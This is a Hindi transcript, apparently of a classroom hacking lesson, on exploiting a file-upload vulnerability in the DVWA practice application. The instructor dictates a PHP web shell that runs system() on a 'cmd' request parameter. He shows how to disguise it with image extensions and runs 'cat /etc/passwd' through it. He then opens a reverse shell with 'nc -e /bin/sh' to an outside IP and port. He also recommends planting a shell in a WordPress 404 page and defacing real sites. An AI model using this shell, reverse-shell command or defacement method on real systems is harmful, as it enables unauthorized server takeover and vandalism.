रिस्क फैक्टर्स ठीक है, अटैक ऑन एप्लीकेशन पर अपलोड डॉट जेएसपी जीआईएफ यूज फाइल्स तो हैं ऑन सिस्टम फाइल मैच। यहाँ पे तो हमको कुछ ऐसा दिख नहीं रहा जो हमारी हेल्प कर सके। यहाँ पे तो हमारे काम को कुछ नहीं था जो हेल्प कर सके हमारा। अब हमको खुद से ही देखना पड़ेगा यहाँ पे कि यहाँ पे कौन कौन सी फाइल्स को हम लोग अपलोड कर सकते हैं, क्योंकि यहाँ पे जेपीजी मेंशन किया गया है बट डीवीडब्ल्यूएबल अपलोड से भी नहीं है। सो मीडियम सेटिंग्स में तो जो मैंने मेथड बताया है वो काम कर जाएगा, और बाकी एक हायर वाले में ट्राई करते हैं कि यहाँ पे क्या है। अपलोडेड एक्सटेंशन डॉट जेपीजी या जेपीजी जेपीईजी देन यहाँ पे एंड अपलोडेड साइज ये है। सो यहाँ पे जेपीजी इस बार काम कर जाना चाहिए। बैकएंड में तो यही सारी प्रोग्रामिंग लिखी गई है। योर इमेज वाज नॉट अपलोडेड, तो और क्या काम करेगा यहाँ पे। ओम शेल अल्फा डॉट जेपीजी ये भी अपलोडेड नहीं हुई। तो देखो अब बेसिकली हमको यहाँ पे देखना पड़ेगा कौन सी फाइल अपलोड कर सकते हैं। तो रियल लाइफ वेबसाइट्स में क्या होता है कि वहाँ पे कुछ पर्टिकुलर काइंड ऑफ ही रहती हैं, और यहाँ पे क्लाइंट साइड पे आपको बता देगा, क्लाइंट साइड में रिस्ट्रिक्शंस देगा कि आप लोग ये फाइल अपलोड नहीं कर सकते हो, वो फाइल अपलोड नहीं कर सकते हो। तो आपको करना क्या है कि आपका जो मालवेयर है, जैसे अगर हम एलएस करें तो हमारा बैकडोर, तो इसको रीनेम कर देना है। इसी के आगे आपको कोई लाइक एक्सटेंशन लगा देना है जो वेबसाइट सपोर्ट करे। जैसे कि अगर जेपीजी करे तो जेपीजी या पीएनजी ऐसे कर देना है। देन इसको एक बार आप लोगों को चूज फाइल होम शेल बैकडोर डॉट पीएनजी डॉट जेपीजी ऐसे एंड अपलोड। तो यहाँ पे पीएनजी फाइल भी अपलोड नहीं हो रही है, ना जेपीजी ना जेपीईजी, बट इसके बैकएंड में तो ये बता तो यही रखा है कि यहाँ पे इस पाथ में जाएगा। अपलोडेड नेम, अपलोडेड एक्सटेंशन, यहाँ पे जेपीजी और इस फॉर्मेट में जेपीजी और इस फॉर्मेट में दे रखा है, बट दोनों यहाँ पे क्यों नहीं हो रहा है। हाई मीडियम, तो पहले वाले में तो यहाँ पे लाइक कुछ था नहीं, बट सो यहाँ पे तो यही बताया गया है। सो आई गेस इसमें कुछ प्रॉब्लम है, या इसका जो ओल्डर वर्जन है मेरे को मिलेगा तो उसको मैं आपको इंस्टॉल करके बताऊंगा। ओके, सो जस्ट वेट, मैं किसी से मांग के देखूंगा, मेरे पे किसी पुराने स्टूडेंट्स के पास होगा। ओके, सो यहाँ पे बेसिकली यही कुछ मेथड्स हैं जो कि आप लोग इम्प्लीमेंट कर सकते हो और यहाँ पे ट्राई कर सकते हो। ठीक है, सो मैं एक आपको नॉर्मल से एक डीयूडब्ल्यू सिक्योरिटी सेटिंग्स एक लो, और यहाँ पे एक और पीएचपी का बैकडोर कोड करना बताता हूँ। ठीक है, एंड एलएस करते हैं बैकडोर, इसी को हम लोग वापस से एडिट करते हैं। ठीक है, सो अभी हम लोग यहाँ पे बनाने वाले हैं हमारा थोड़ा सा, इसमें जो है थोड़ा प्रॉब्लम लगेगा आपको, क्योंकि इसमें थोड़ा प्रॉब्लम लग सकता है क्योंकि ये थोड़ा कॉम्प्लेक्स है। ओके, सो अब बेसिकली यहाँ पे हम लोग एक कंडीशन लगाने वाले हैं
इफ ओके पे इफ कंडीशन, ठीक है। तो यहाँ पे अब क्या है, इफ एंड इसके बाद ब्रैकेट्स इज सेट, ओके सेट एंड देन बस एक ब्रैकेट जितना हमारा है कि ये डॉलर का साइन अंडरस्कोर रिक्वेस्ट रिक्वेस्ट, ओके। अब इसके अंदर हमको रिक्वेस्ट कराने है, क्या रिक्वेस्ट कराना है हमको, सीएमडी रिक्वेस्ट कराना है, सीएमडी, ओके। हम रिक्वेस्ट कर रहे हैं ताकि सीएमडी ओपन हो जाए एंड ठीक है, ये तो हो गया हमारा। एंड नाउ हमको यहाँ पे एक ब्रैकेट ऐसे खोलना है एंड इसके आगे से हमको लिखना शुरू करना है, यहाँ से इधर इतने तक में, इसी इसी के पास इतना आसपास एको, ठीक है। प्री नॉर्मली एंड इसको यहाँ पे क्लोज कर देना है एंड यहाँ पे हम उस आर्गुमेंट को लेंगे जो कि हमने यहाँ पे जिसको हमने रिक्वेस्ट करी है ओपन करने के लिए, सी एम डी, ठीक है। एंड सी एम डी इक्वल्स टू, हम लोग ब्रैकेट देंगे एंड इसके यहाँ पे भी वापस से हम लोग रिक्वेस्ट कराएंगे सी एम डी को, ठीक है। इसको हमने ये एक वेरिएबल पे असाइन कर दिया गया है। पीएचपी में वेरिएबल ऐसे क्रिएट किए जाते हैं, ओके। द नॉर्मल एक डॉलर का साइन अंडरस्कोर रिक्वेस्ट एंड नॉर्मल वही CMD एंड इस नॉर्मल यहाँ पे जाना है और इसको बंद कर देना है। बंद करने के बाद अब इस एक नीचे आना है एंड यहाँ पे आपको सिस्टम लिखना है। सिस्टम से, क्योंकि हम लोग सिस्टम से यहाँ पे इसको एग्जीक्यूट कराना चाहते हैं, ठीक है। परसेंटेज नहीं सॉरी, ये डॉलर CMD को सिस्टम में एग्जीक्यूट कराना चाहते हैं, ये इस आर्ग्यूमेंट इस वेरिएबल को, और इस वेरिएबल पे रिक्वेस्ट कर रहा है CMD को ओपन करने के लिए और वो इधर से, ठीक है। तो अब बस ये हमारा ऑलमोस्ट कोड रन हो चुका है, बन गया। वापस से एको प्री, बस इतना, एक मिनट, डबल कोट्स वरना काम नहीं करेगा। एंड इतना लिखने के बाद यहाँ पे डाई लिख देना, डाई इन द सेंस खत्म, ब्रेक, ठीक है। इतना कोड लिखने के बाद यहाँ पे इसको बंद कर देना है, ये इतने से इतना हमारा कोड बन गया है, ओके। सो अब यहाँ पे हमारा ऑलमोस्ट कोड बन चुका है। जस्ट नॉर्मल हमको यहाँ पे सेव कर देना है इसको एंड वापस से अभी आपको करना क्या है कि इसको हम लोग अपलोड करेंगे, अपलोड होम शेल बैकडोर अपलोड, तो यहाँ पे ये अपलोड हो गया। तो अब इस वाले शेल को एक्सेस करने के लिए कुछ अलग मेथड लगाते हैं। सो सिंटैक्स एरर टी एको इन फाइल लाइन 6 में आई गेस कुछ प्रॉब्लम हो गई है। सो इसके लाइन 6 देखते हैं, एको प्री कुछ प्रॉब्लम, क्या प्रॉब्लम हो गई, ओ सॉरी, यहाँ पे प्री टैग ढंग से हमने प्री टैग ओपन किया था बट यहाँ पे हमने क्लोज नहीं किया ढंग से। सेव, वापस से हम इसको अपलोड करते हैं, बैकडोर अपलोड, अनएक्सपेक्टेड टी एको एरर, टी एको अभी भी प्रॉब्लम नहीं, अब क्या प्रॉब्लम आ गई, हमने अपलोड तो कर दिया था। एक मिनट को, सर्वर से हम वो पुराना वाला जो हमारा मालवेयर है उसको हटा देते हैं। तो cd/cd var ls cd var www ls cd db wa ls, देन यहाँ पे cd vulnerabilities ls cd upload ls cd सोर्स में ही होगा, हाई लो नहीं,
cd डॉट डॉट कहाँ पे है लेस अपलोड्स, ये कहाँ पे अपलोड हो रहा है, एक मिनट देखते हैं। ओ सॉरी, हैकेबल। ओके, cd डॉट डॉट ls, यहाँ पे हैकेबल होगा। सी डी ई एक्स एल एस, वहाँ पे भी नहीं है। यहाँ पे ओ सी डी हैकेबल, यहाँ पे एल एस, सी डी अपलोड्स एल एस बैकडोर यहाँ पे, ठीक है। आर एम बैकडोर पेज पे एल एस। ओके, अब ये रिमूव हो गया। अब हम अपना नया बैकडोर वहाँ पे डालते हैं एंड देखते हैं कि सक्सेसफुली अपलोड हुआ कि नहीं। अपलोड अपलोड तो हो गया। ओके, सो यहाँ पे प्रॉब्लम अभी आ रही है। ओके, चलो इसको रन करा के देखते हैं। अब इसको देखो, रन कराने का बैकडोर तो यहाँ पे आपने कर दिया है। अब इसके आगे क्वेश्चन मार्क CMD दे देना है, CMD के बाद इक्वल्स टू। अब इक्वल्स टू के बाद आपको यहाँ पे वो कमांड देनी है जो आप एग्जीक्यूट कराना चाहते हो, जैसे कि मैं LS दे देता हूँ। तो यहाँ पे CMD LS नहीं काम किया, क्या बात है। कैट प्लस स्लैश etc स्लैश पास WD। ओके, अभी भी काम नहीं किया। दैट मीन्स हमारे बैकडोर में ही कुछ प्रॉब्लम है। सो क्या प्रॉब्लम है, समथिंग हमारे कोड में कुछ प्रॉब्लम है, बट कोड तो पूरा परफेक्टली वर्क कर रहा है, हमने ढंग से कोड किया है। यहाँ पे तो हमने ऑलमोस्ट सारी चीज़ ढंग से ही लिखी है। एक बार वापस से चेक कर लेते हैं। इफ इज सेट, ओके, सो आई गेस ये हो गया। इफ इज सेट पर्सन क्वेश्चन मार्क डॉलर, रिक्वेस्ट की स्पेलिंग भी हमने सही लिखी है। देन उसके बाद CMD, ठीक है। देन उसके बाद एको प्री, ओके। देन परसेंटेज एक वेरिएबल क्रिएट किया इक्वल्स टू जिसने रिक्वेस्ट किया CMD, ठीक है। प्रॉब्लम नहीं यहाँ तक। सिस्टम CMD, ओके। सिस्टम CMD हमको गड़बड़ी मिल गई यहाँ पे, इसको हमने क्लोज नहीं किया था, अब हमको गड़बड़ी मिल गई। अब ये हमारा बैकडोर सेव कर दिया है। चूज होम शेल बैकडोर लोड। तो यहाँ पे देखो, अब यहाँ पे कोई एरर देखने को नहीं मिल रहा है। दैट मीन्स अब हमारा बैकडोर सक्सेसफुली काम कर रहा है, एडमिन काम करने के लिए रेडी है। तो अब यहाँ पे हम लोग क्वेश्चन मार्क CMD LS लिखते हैं, तो यहाँ पे देखो वही चीज़ें आ गई, बैकडोर डॉट PHP। अगर यहाँ पे हम कैट बैकडोर डॉट PHP, यहाँ पे देखो हमारे पास चीज़ें लिख के आ गई कि कैसे काम कर रही है। ओके, सो अब यहाँ से आप लोग कुछ भी करा सकते हो। अब यहाँ से आप लोग रिमोट कोड एग्जीक्यूशन भी करा सकते हो, जैसे कि NC-E/bin/sh 192.168.29.51। देन हमको यहाँ पे पोर्ट दे देना है 4455 एंड वापस से हम लोग यहाँ पे NC ये करते हैं एंड यहाँ से हम लोग हिट एंटर करते हैं एंड वापस बैकडोर पे जाते हैं। तो यहाँ पे देखो सक्सेसफुली कनेक्ट हो गए हैं नॉर्मली। ओके, सो यही था हमारा, कह सकते हो, ऑलमोस्ट फाइल अपलोडेशन वल्नरेबिलिटी। तो देखा, हैकर्स लोग ऐसे ही वेबसाइट्स का रिवर्सल लेकर, इवन दो इनको कई सारे एडवांस वे में भी बनाया जाता है, एडवांस लाइक इसमें HTML CSS जावास्क्रिप्ट PHP पूरा यूज़ होता है इन शेल्स को बनाने के लिए, जो एडवांस शेल बनते हैं। ओके, सो यहाँ से अब आप लोग, जैसे कि ये बन गया, तो अब आप इसमें कुछ भी कर सकते हो, ठीक है। अब इसमें आप कुछ भी अपलोड, इसमें आप यहाँ से कुछ भी कर सकते हो एंड ऑल ओवर पूरा वेबसाइट का कंट्रोल लेकर वेबसाइट को अपने हिसाब से कंट्रोल कर सकते हो। ने ऐसे ही रिवर्सल लिया था क्या, किस चीज़ का?
डिफेंस में वो वेबसाइट वर्डप्रेस की थी, और वर्डप्रेस में भी हाँ ऐसे तुम ट्राई कर सकते हो। उसके 404 वाले पेज पे कर दो और कोई भी उसको कैसे भी करके एग्जीक्यूट करा दो, देन सिंपली वो काम हो जाता है एंड उसके बाद रिवर्सल लेकर कर सकते हो। बट वर्डप्रेस वाली बहुत इजी होती है, उसको रिवर्सल लेना नहीं पड़ता है। रिवर्सल लेना चाहो तो उसमें पोर्ट फॉरवर्डिंग करनी पड़ती है पहले। ओके, तो इसलिए उतना कौन झंझट करे, सीधा नॉर्मल अपना शेल अपलोड करके डिफेस कर दो। ओके, बट मैं ऐसे कोई इलीगल एक्टिविटीज तुम लोगों को नहीं प्रमोट कर रहा हूँ कि तुम लोग भी करो। ओके, जस्ट ये मैंने तुम लोगों को एजुकेशनल पर्पस के लिए दिखाया कि तुम लोग वहाँ पे बता सको कि एक्चुअल में तुमने सर्वर का कंट्रोल ले लिया है। तो इसी को हम लोग वेब एप्लीकेशन पेनिट्रेशन टेस्टिंग बोलते हैं, जिसमें आप लोग सर्वर का एक्सेस ले लो सक्सेसफुली, तभी वो आपको मानते हैं कि हाँ इसका एक्चुअल में कुछ कॉज है, इससे आप लोग एक हैकर कुछ एक्चुअल में कर सकता है। ओके, सो अभी किसी को कोई डाउट है देन आप लोग पूछ सकते हो।